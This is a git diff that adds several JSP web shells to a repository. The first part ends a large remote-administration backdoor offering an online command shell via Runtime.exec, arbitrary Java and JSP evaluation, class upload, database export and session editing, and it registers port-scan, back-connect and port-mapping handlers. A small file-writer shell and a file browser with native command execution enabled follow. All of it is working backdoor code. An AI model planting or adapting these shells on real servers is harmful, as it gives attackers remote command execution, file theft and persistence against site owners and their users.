"); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +if (JSession.getAttribute(ENTER_MSG) != null) { +String outEntry = request.getParameter("outentry"); +if (Util.isEmpty(outEntry) || !outEntry.equals("true")) +Util.outMsg(out,JSession.getAttribute(ENTER_MSG).toString()); +} +} catch (Exception e) { + +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
"); +out.println("

Shell OnLine »


"); +out.println("
"+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input Some Commands First After You Start Or You Will Not See The Echo"+ +"
"+ +"
"+ +" "+ +"
"+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
"+ +" " +); +out.println("
"); +} catch (Exception e) { +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+System.getProperty("file.encoding")); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start(); +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { + +throw e; +} +} +} +private static class EnterInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (!Util.isEmpty(type)) { +JSession.removeAttribute(ENTER); +JSession.removeAttribute(ENTER_MSG); +JSession.removeAttribute(ENTER_CURRENT_DIR); +JSession.setAttribute(MSG,"Exit File Success ! "); +} else { +String f = request.getParameter("filepath"); +if (Util.isEmpty(f)) +return; +JSession.setAttribute(ENTER,f); +JSession.setAttribute(ENTER_MSG,"You Are In File \""+f+"\" Now ! Exit "); +} +response.sendRedirect(SHELL_NAME); +} +} +private static class VExport2FileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +String sql = request.getParameter("sql"); +String table = request.getParameter("table"); +if (Util.isEmpty(sql) && Util.isEmpty(table)) { +JSession.setAttribute(SESSION_O,"vConn"); +response.sendRedirect(SHELL_NAME); +return; +} +out.println("
"+ +""+ +" "+ +" "+ +" "+ +"
"+ +" "+ +" "+ +" "+ +" "+ +"

Export To File »

"+ +" "+ +"
Export \""+(Util.isEmpty(sql) ? table : sql.replaceAll("\"","""))+"\" To File : "+ +" "+ +"

"+BACK_HREF+"
"+ +"
"); +} +} + +private static class ExportInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +String type = request.getParameter("type"); +String filepath = request.getParameter("filepath"); +String encode = request.getParameter("encode"); +String sql = null; +DBOperator dbo = null; +dbo = (DBOperator)JSession.getAttribute(DBO); + +if (Util.isEmpty(type)) { +//table export +String tb = request.getParameter("table"); +if (Util.isEmpty(tb)) +return; +String s = dbo.getConn().getMetaData().getIdentifierQuoteString(); +sql = "select * from "+s+tb+s; + +} else if (type.equals("queryexp")) { +//query export +sql = request.getParameter("sql"); +if (Util.isEmpty(sql)) { +JSession.setAttribute(SESSION_O,"vConn"); +response.sendRedirect(SHELL_NAME); +return; +} +} +Object o = dbo.execute(sql); +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +byte[] rowSep = "\r\n".getBytes(); +if (o instanceof ResultSet) { +ResultSet rs = (ResultSet)o; +ResultSetMetaData meta = rs.getMetaData(); +int count = meta.getColumnCount(); +for (int i =1;i<=count;i++) { +String colName = meta.getColumnName(i)+"\t"; +byte[] b = null; +if (Util.isEmpty(encode)) +b = colName.getBytes(); +else +b = colName.getBytes(encode); +bout.write(b,0,b.length); +} +bout.write(rowSep,0,rowSep.length); +while (rs.next()) { +for (int i =1;i<=count;i++) { +String v = null; +try { +v = rs.getString(i); +} catch (SQLException ex) { +v = "<>"; +} +v += "\t"; +byte[] b = null; +if (Util.isEmpty(encode)) +b = v.getBytes(); +else +b = v.getBytes(encode); +bout.write(b,0,b.length); +} +bout.write(rowSep,0,rowSep.length); +} +rs.close(); +ByteArrayInputStream input = new ByteArrayInputStream(bout.toByteArray()); +BufferedOutputStream output = null; +if (!Util.isEmpty(filepath)) { +//export2file +output = new BufferedOutputStream(new FileOutputStream(new File(filepath))); +} else { +//download. +response.setHeader("Content-Disposition","attachment;filename=DataExport.txt"); +output = new BufferedOutputStream(response.getOutputStream()); +} +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +bout.close(); +input.close(); +output.close(); +if (!Util.isEmpty(filepath)) { +JSession.setAttribute(MSG,"Export To File Success !"); +response.sendRedirect(SHELL_NAME); +} +} +} +} +private static class EvalInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +String type = request.getParameter("type"); +PrintWriter out = response.getWriter(); +Object msg = JSession.getAttribute(MSG); +if (msg != null) { +Util.outMsg(out,(String)msg); +JSession.removeAttribute(MSG); +} +if (Util.isEmpty(type)) { +out.println(""+ +" "+ +" "+ +" "+ +"

Eval Java Code »

"+ +"
"+ +"

"+ +"

"+ +"UpLoad a Class File : "); +Util.outMsg(out,"
"+
+"public class SpyEval{\r\n"+
+"	static {\r\n"+
+"		//Your Code Here.\r\n"+
+"	}\r\n"+
+"}\r\n"+
+"
","left"); +out.println("
"+ +"

Jsp Eval :
"+ +" "+ +" "+ +"
"+ +"
"+ +"

"+ +"
"); +} else if (type.equals("jsp")){ +String jspc = request.getParameter("jspc"); +if (Util.isEmpty(jspc)) +return; +File f = new File(SHELL_DIR,"evaltmpninty.jsp"); +BufferedWriter writer = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f),"utf-8")); +writer.write(jspc,0,jspc.length()); +writer.flush(); +writer.close(); +out.println(""+ +" "+ +"

Jsp Eval Result »

"); +out.println("
"); +request.getRequestDispatcher("evaltmpninty.jsp").include(request,response); +out.println("
"); +f.delete(); +} +} +} +private static class EvalUploadInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +ByteArrayOutputStream stream = new ByteArrayOutputStream(); +UploadBean upload = new UploadBean(); +upload.setTargetOutput(stream); +upload.parseRequest(request); + +if (stream.toByteArray().length == 2) { +JSession.setAttribute(MSG,"Please Upload Your Class File ! "); +((Invoker)ins.get("ev")).invoke(request,response,JSession); +return; +} +SpyClassLoader loader = new SpyClassLoader(); +try { +Class c = loader.defineClass(null,stream.toByteArray()); +c.newInstance(); +}catch(Exception e) { +} +stream.close(); +JSession.setAttribute(MSG,"Eval Java Class Done ! "); +((Invoker)ins.get("ev")).invoke(request,response,JSession); +} +} +private static class VOtherInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object msg = JSession.getAttribute(MSG); +if (msg != null) { +Util.outMsg(out,(String)msg); +JSession.removeAttribute(MSG); +} +out.println(""+ +" "+ +" "+ +" "+ +"

Session Manager>>

"+ +"
"+ +"
    "); +Enumeration en = JSession.getAttributeNames(); +while (en.hasMoreElements()) { +Object o = en.nextElement(); +if (o.toString().equals(MSG)) +continue; +out.println("
  • "+o.toString()+" "); +out.println(" "); +out.println(""); +out.println(""); +out.println("
    • "); +} +out.println("
  • "+ +"New Session Attribute"+ +"name : value : "+ +"
"); +} catch (Exception e) { +throw e ; +} +} +} +//Session Manager +private static class SmInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +PrintWriter out = response.getWriter(); +if (type.equals("update")) { +String name = request.getParameter("name"); +String value = request.getParameter("value"); +JSession.setAttribute(name,value); +JSession.setAttribute(MSG,"Update/Add Attribute Success !"); +} else if (type.equals("delete")) { +String name = request.getParameter("name"); +JSession.removeAttribute(name); +JSession.setAttribute(MSG,"Remove Attribute Success !"); +} +((Invoker)ins.get("vother")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoveDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +ins.put("enter",new EnterInvoker()); +ins.put("export",new ExportInvoker()); +ins.put("ev",new EvalInvoker()); +ins.put("eu",new EvalUploadInvoker()); +ins.put("vother",new VOtherInvoker()); +ins.put("sm",new SmInvoker()); +ins.put("vExport",new VExport2FileInvoker()); +ins.put("vPack",new VPackConfigInvoker()); +ins.put("reflect",new ReflectInvoker()); +ins.put("portBack",new PortBackInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (Util.isEmpty(o)) { +if (session.getAttribute(SESSION_O) == null) +o = "index"; +else { +o = session.getAttribute(SESSION_O).toString(); +session.removeAttribute(SESSION_O); +} +} +Object obj = ins.get(o); +if (obj == null) { +response.sendRedirect(SHELL_NAME); +} else { + Invoker in = (Invoker)obj; +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path) && session.getAttribute(ENTER) == null) +session.setAttribute(CURRENT_DIR,path); +((Invoker)ins.get("before")).invoke(request,response,session); +((Invoker)ins.get("script")).invoke(request,response,session); +((Invoker)ins.get("top")).invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +((Invoker)ins.get("bottom")).invoke(request,response,session); +((Invoker)ins.get("after")).invoke(request,response,session); +} +} +} catch (Exception e) { +Object msg = session.getAttribute(MSG); +if (msg != null) { +Util.outMsg(out,(String)msg); +session.removeAttribute(MSG); +} +if (e.toString().indexOf("ClassCastException") != -1) { +Util.outMsg(out,MODIFIED_ERROR + BACK_HREF); +} +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replaceAll("\n","
"),"left"); +bout.close(); +out.flush(); +((Invoker)ins.get("bottom")).invoke(request,response,session); +((Invoker)ins.get("after")).invoke(request,response,session); +} +%> diff --git a/jsp/123.jsp b/jsp/123.jsp new file mode 100644 index 0000000..4fed2c0 --- /dev/null +++ b/jsp/123.jsp @@ -0,0 +1,48 @@ + +<%@page contentType="text/html;charset=gb2312"%> +<%@page import="java.io.*,java.util.*,java.net.*"%> + + + JspDo Code By Xiao.3 + + + + <% + if(request.getParameter("context")!=null) + { + String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"gb2312"); + String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"gb2312"); + OutputStream pt = null; + try { + pt = new FileOutputStream(path); + pt.write(context.getBytes()); + out.println("????????????!"); + } catch (FileNotFoundException ex2) { + out.println("????????????!"); + } catch (IOException ex) { + out.println("????????????!"); + } finally { + try { + pt.close(); + } catch (IOException ex3) { + out.println("????????????!"); + } + } +} + %> +
+ ??????????????????:<%out.print(request.getRealPath(request.getServletPath())); %> +
+
+ ??????????????????:"> +
+
+ ??????????????????: +
+
+ +
+ + diff --git a/jsp/201.jsp b/jsp/201.jsp new file mode 100644 index 0000000..2bac9d1 --- /dev/null +++ b/jsp/201.jsp @@ -0,0 +1,1934 @@ +<%-- + jsp File browser 1.2 + Copyright (C) 2003-2006 Boris von Loesch + This program is free software; you can redistribute it and/or modify it under + the terms of the GNU General Public License as published by the + Free Software Foundation; either version 2 of the License, or (at your option) + any later version. + This program is distributed in the hope that it will be useful, but + WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or + FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. + You should have received a copy of the GNU General Public License along with + this program; if not, write to the + Free Software Foundation, Inc., + 59 Temple Place, Suite 330, + Boston, MA 02111-1307 USA + - Description: jsp File browser v1.2 -- This JSP program allows remote web-based + file access and manipulation. You can copy, create, move and delete files. + Text files can be edited and groups of files and folders can be downloaded + as a single zip file that's created on the fly. + - Credits: Taylor Bastien, David Levine, David Cowan, Lieven Govaerts +--%> +<%@page import="java.util.*, + java.net.*, + java.text.*, + java.util.zip.*, + java.io.*" +%> +<%! + //FEATURES + private static final boolean NATIVE_COMMANDS = true; + /** + *If true, all operations (besides upload and native commands) + *which change something on the file system are permitted + */ + private static final boolean READ_ONLY = false; + //If true, uploads are allowed even if READ_ONLY = true + private static final boolean ALLOW_UPLOAD = true; + + //Allow browsing and file manipulation only in certain directories + private static final boolean RESTRICT_BROWSING = false; + //If true, the user is allowed to browse only in RESTRICT_PATH, + //if false, the user is allowed to browse all directories besides RESTRICT_PATH + private static final boolean RESTRICT_WHITELIST = false; + //Paths, sperated by semicolon + //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!! + private static final String RESTRICT_PATH = "/etc;/var"; + + //The refresh time in seconds of the upload monitor window + private static final int UPLOAD_MONITOR_REFRESH = 2; + //The number of colums for the edit field + private static final int EDITFIELD_COLS = 85; + //The number of rows for the edit field + private static final int EDITFIELD_ROWS = 30; + //Open a new window to view a file + private static final boolean USE_POPUP = true; + /** + * If USE_DIR_PREVIEW = true, then for every directory a tooltip will be + * created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries. + * This can yield to performance issues. Turn it off, if the directory loads to slow. + */ + private static final boolean USE_DIR_PREVIEW = false; + private static final int DIR_PREVIEW_NUMBER = 10; + /** + * The name of an optional CSS Stylesheet file + */ + private static final String CSS_NAME = "Browser.css"; + /** + * The compression level for zip file creation (0-9) + * 0 = No compression + * 1 = Standard compression (Very fast) + * ... + * 9 = Best compression (Very slow) + */ + private static final int COMPRESSION_LEVEL = 1; + /** + * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the + * server runs on a windows platform, to avoid a message box, if you try to access + * an empty removable drive (See KNOWN BUGS in Readme.txt). + */ + private static final String[] FORBIDDEN_DRIVES = {"a:\\"}; + + /** + * Command of the shell interpreter and the parameter to run a programm + */ + private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows + //private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // Unix + + /** + * Max time in ms a process is allowed to run, before it will be terminated + */ + private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds + + //Button names + private static final String SAVE_AS_ZIP = "Download selected files as (z)ip"; + private static final String RENAME_FILE = "(R)ename File"; + private static final String DELETE_FILES = "(Del)ete selected files"; + private static final String CREATE_DIR = "Create (D)ir"; + private static final String CREATE_FILE = "(C)reate File"; + private static final String MOVE_FILES = "(M)ove Files"; + private static final String COPY_FILES = "Cop(y) Files"; + private static final String LAUNCH_COMMAND = "(L)aunch external program"; + private static final String UPLOAD_FILES = "Upload"; + + //Normally you should not change anything after this line + //---------------------------------------------------------------------------------- + //Change this to locate the tempfile directory for upload (not longer needed) + private static String tempdir = "."; + private static String VERSION_NR = "1.2"; + private static DateFormat dateFormat = DateFormat.getDateTimeInstance(); + + public class UplInfo { + + public long totalSize; + public long currSize; + public long starttime; + public boolean aborted; + + public UplInfo() { + totalSize = 0l; + currSize = 0l; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public UplInfo(int size) { + totalSize = size; + currSize = 0; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public String getUprate() { + long time = System.currentTimeMillis() - starttime; + if (time != 0) { + long uprate = currSize * 1000 / time; + return convertFileSize(uprate) + "/s"; + } + else return "n/a"; + } + + public int getPercent() { + if (totalSize == 0) return 0; + else return (int) (currSize * 100 / totalSize); + } + + public String getTimeElapsed() { + long time = (System.currentTimeMillis() - starttime) / 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + public String getTimeEstimated() { + if (currSize == 0) return "n/a"; + long time = System.currentTimeMillis() - starttime; + time = totalSize * time / currSize; + time /= 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + } + + public class FileInfo { + + public String name = null, clientFileName = null, fileContentType = null; + private byte[] fileContents = null; + public File file = null; + public StringBuffer sb = new StringBuffer(100); + + public void setFileContents(byte[] aByteArray) { + fileContents = new byte[aByteArray.length]; + System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); + } + } + + public static class UploadMonitor { + + static Hashtable uploadTable = new Hashtable(); + + static void set(String fName, UplInfo info) { + uploadTable.put(fName, info); + } + + static void remove(String fName) { + uploadTable.remove(fName); + } + + static UplInfo getInfo(String fName) { + UplInfo info = (UplInfo) uploadTable.get(fName); + return info; + } + } + + // A Class with methods used to process a ServletInputStream + public class HttpMultiPartParser { + + //private final String lineSeparator = System.getProperty("line.separator", "\n"); + private final int ONE_MB = 1024 * 1; + + public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, + int clength) throws IllegalArgumentException, IOException { + if (is == null) throw new IllegalArgumentException("InputStream"); + if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( + "\"" + boundary + "\" is an illegal boundary indicator"); + boundary = "--" + boundary; + StringTokenizer stLine = null, stFields = null; + FileInfo fileInfo = null; + Hashtable dataTable = new Hashtable(5); + String line = null, field = null, paramName = null; + boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); + boolean isFile = false; + if (saveFiles) { // Create the required directory (including parent dirs) + File f = new File(saveInDir); + f.mkdirs(); + } + line = getLine(is); + if (line == null || !line.startsWith(boundary)) throw new IOException( + "Boundary not found; boundary = " + boundary + ", line = " + line); + while (line != null) { + if (line == null || !line.startsWith(boundary)) return dataTable; + line = getLine(is); + if (line == null) return dataTable; + stLine = new StringTokenizer(line, ";\r\n"); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + line = stLine.nextToken().toLowerCase(); + if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( + "Bad data in second line"); + stFields = new StringTokenizer(stLine.nextToken(), "=\""); + if (stFields.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + fileInfo = new FileInfo(); + stFields.nextToken(); + paramName = stFields.nextToken(); + isFile = false; + if (stLine.hasMoreTokens()) { + field = stLine.nextToken(); + stFields = new StringTokenizer(field, "=\""); + if (stFields.countTokens() > 1) { + if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { + fileInfo.name = paramName; + String value = stFields.nextToken(); + if (value != null && value.trim().length() > 0) { + fileInfo.clientFileName = value; + isFile = true; + } + else { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + } + else if (field.toLowerCase().indexOf("filename") >= 0) { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + boolean skipBlankLine = true; + if (isFile) { + line = getLine(is); + if (line == null) return dataTable; + if (line.trim().length() < 1) skipBlankLine = false; + else { + stLine = new StringTokenizer(line, ": "); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in third line"); + stLine.nextToken(); // Content-Type + fileInfo.fileContentType = stLine.nextToken(); + } + } + if (skipBlankLine) { + line = getLine(is); + if (line == null) return dataTable; + } + if (!isFile) { + line = getLine(is); + if (line == null) return dataTable; + dataTable.put(paramName, line); + // If parameter is dir, change saveInDir to dir + if (paramName.equals("dir")) saveInDir = line; + line = getLine(is); + continue; + } + try { + UplInfo uplInfo = new UplInfo(clength); + UploadMonitor.set(fileInfo.clientFileName, uplInfo); + OutputStream os = null; + String path = null; + if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir, + fileInfo.clientFileName)); + else os = new ByteArrayOutputStream(ONE_MB); + boolean readingContent = true; + byte previousLine[] = new byte[2 * ONE_MB]; + byte temp[] = null; + byte currentLine[] = new byte[2 * ONE_MB]; + int read, read3; + if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { + line = null; + break; + } + while (readingContent) { + if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { + line = null; + uplInfo.aborted = true; + break; + } + if (compareBoundary(boundary, currentLine)) { + os.write(previousLine, 0, read - 2); + line = new String(currentLine, 0, read3); + break; + } + else { + os.write(previousLine, 0, read); + uplInfo.currSize += read; + temp = currentLine; + currentLine = previousLine; + previousLine = temp; + read = read3; + }//end else + }//end while + os.flush(); + os.close(); + if (!saveFiles) { + ByteArrayOutputStream baos = (ByteArrayOutputStream) os; + fileInfo.setFileContents(baos.toByteArray()); + } + else fileInfo.file = new File(path); + dataTable.put(paramName, fileInfo); + uplInfo.currSize = uplInfo.totalSize; + }//end try + catch (IOException e) { + throw e; + } + } + return dataTable; + } + + /** + * Compares boundary string to byte array + */ + private boolean compareBoundary(String boundary, byte ba[]) { + if (boundary == null || ba == null) return false; + for (int i = 0; i < boundary.length(); i++) + if ((byte) boundary.charAt(i) != ba[i]) return false; + return true; + } + + /** Convenience method to read HTTP header lines */ + private synchronized String getLine(ServletInputStream sis) throws IOException { + byte b[] = new byte[1024]; + int read = sis.readLine(b, 0, b.length), index; + String line = null; + if (read != -1) { + line = new String(b, 0, read); + if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1); + } + return line; + } + + public String getFileName(String dir, String fileName) throws IllegalArgumentException { + String path = null; + if (dir == null || fileName == null) throw new IllegalArgumentException( + "dir or fileName is null"); + int index = fileName.lastIndexOf('/'); + String name = null; + if (index >= 0) name = fileName.substring(index + 1); + else name = fileName; + index = name.lastIndexOf('\\'); + if (index >= 0) fileName = name.substring(index + 1); + path = dir + File.separator + fileName; + if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); + else return path.replace('/', File.separatorChar); + } + } //End of class HttpMultiPartParser + + /** + * This class is a comparator to sort the filenames and dirs + */ + class FileComp implements Comparator { + + int mode; + int sign; + + FileComp() { + this.mode = 1; + this.sign = 1; + } + + /** + * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type + * The default sorting method is by Name + * Negative mode means descending sort + */ + FileComp(int mode) { + if (mode < 0) { + this.mode = -mode; + sign = -1; + } + else { + this.mode = mode; + this.sign = 1; + } + } + + public int compare(Object o1, Object o2) { + File f1 = (File) o1; + File f2 = (File) o2; + if (f1.isDirectory()) { + if (f2.isDirectory()) { + switch (mode) { + //Filename or Type + case 1: + case 4: + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + //Filesize + case 2: + return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); + //Date + case 3: + return sign + * (new Long(f1.lastModified()) + .compareTo(new Long(f2.lastModified()))); + default: + return 1; + } + } + else return -1; + } + else if (f2.isDirectory()) return 1; + else { + switch (mode) { + case 1: + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + case 2: + return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); + case 3: + return sign + * (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified()))); + case 4: { // Sort by extension + int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.'); + int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.'); + if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + } + // f1 has no extension + else if (tempIndexf1 == -1) return -sign; + // f2 has no extension + else if (tempIndexf2 == -1) return sign; + // Both have an extension + else { + String tempEndf1 = f1.getAbsolutePath().toUpperCase() + .substring(tempIndexf1); + String tempEndf2 = f2.getAbsolutePath().toUpperCase() + .substring(tempIndexf2); + return sign * tempEndf1.compareTo(tempEndf2); + } + } + default: + return 1; + } + } + } + } + + /** + * Wrapperclass to wrap an OutputStream around a Writer + */ + class Writer2Stream extends OutputStream { + + Writer out; + + Writer2Stream(Writer w) { + super(); + out = w; + } + + public void write(int i) throws IOException { + out.write(i); + } + + public void write(byte[] b) throws IOException { + for (int i = 0; i < b.length; i++) { + int n = b[i]; + //Convert byte to ubyte + n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); + out.write(n); + } + } + + public void write(byte[] b, int off, int len) throws IOException { + for (int i = off; i < off + len; i++) { + int n = b[i]; + n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); + out.write(n); + } + } + } //End of class Writer2Stream + + static Vector expandFileList(String[] files, boolean inclDirs) { + Vector v = new Vector(); + if (files == null) return v; + for (int i = 0; i < files.length; i++) + v.add(new File(URLDecoder.decode(files[i]))); + for (int i = 0; i < v.size(); i++) { + File f = (File) v.get(i); + if (f.isDirectory()) { + File[] fs = f.listFiles(); + for (int n = 0; n < fs.length; n++) + v.add(fs[n]); + if (!inclDirs) { + v.remove(i); + i--; + } + } + } + return v; + } + + /** + * Method to build an absolute path + * @param dir the root dir + * @param name the name of the new directory + * @return if name is an absolute directory, returns name, else returns dir+name + */ + static String getDir(String dir, String name) { + if (!dir.endsWith(File.separator)) dir = dir + File.separator; + File mv = new File(name); + String new_dir = null; + if (!mv.isAbsolute()) { + new_dir = dir + name; + } + else new_dir = name; + return new_dir; + } + + /** + * This Method converts a byte size in a kbytes or Mbytes size, depending on the size + * @param size The size in bytes + * @return String with size and unit + */ + static String convertFileSize(long size) { + int divisor = 1; + String unit = "bytes"; + if (size >= 1024 * 1024) { + divisor = 1024 * 1024; + unit = "MB"; + } + else if (size >= 1024) { + divisor = 1024; + unit = "KB"; + } + if (divisor == 1) return size / divisor + " " + unit; + String aftercomma = "" + 100 * (size % divisor) / divisor; + if (aftercomma.length() == 1) aftercomma = "0" + aftercomma; + return size / divisor + "." + aftercomma + " " + unit; + } + + /** + * Copies all data from in to out + * @param in the input stream + * @param out the output stream + * @param buffer copy buffer + */ + static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException { + copyStreamsWithoutClose(in, out, buffer); + in.close(); + out.close(); + } + + /** + * Copies all data from in to out + * @param in the input stream + * @param out the output stream + * @param buffer copy buffer + */ + static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer) + throws IOException { + int b; + while ((b = in.read(buffer)) != -1) + out.write(buffer, 0, b); + } + + /** + * Returns the Mime Type of the file, depending on the extension of the filename + */ + static String getMimeType(String fName) { + fName = fName.toLowerCase(); + if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg"; + else if (fName.endsWith(".gif")) return "image/gif"; + else if (fName.endsWith(".pdf")) return "application/pdf"; 